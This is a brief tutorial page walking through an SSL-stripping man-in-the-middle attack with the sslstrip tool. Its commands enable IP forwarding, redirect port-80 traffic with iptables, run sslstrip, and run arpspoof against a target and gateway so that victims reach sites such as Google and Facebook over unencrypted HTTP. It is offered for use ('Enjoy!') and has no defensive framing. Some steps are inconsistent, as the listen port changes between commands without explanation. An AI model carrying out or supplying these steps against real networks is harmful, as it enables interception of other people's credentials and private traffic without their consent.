How To Break SSL Protection via MITM Attack With SSLStrip Tool

How To Break SSL Protection via MITM Attack With SSLStrip Tool

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks. It requires Python 2.5 or newer, along with the 'twisted' python module.

First Requirements:

• Run Python
• The python "twisted-web" module (apt-get install python-twisted-web)

Setup

•  Unpack: tar zxvf sslstrip-0.5.tar.gz
•  Install twisted:  sudo apt-get install python-twisted

How to Run?

Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Run sslstrip.
sslstrip.py -l <listenPort>

Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

When ARPspoof start capturing traffic then SSL strip became success use the following command.
sslstrip -l 8080

Now type facebook.com or Google.com into your browser and open these websites without Https. It will be open http://google.com :P

Enjoy!

Download SSLStrip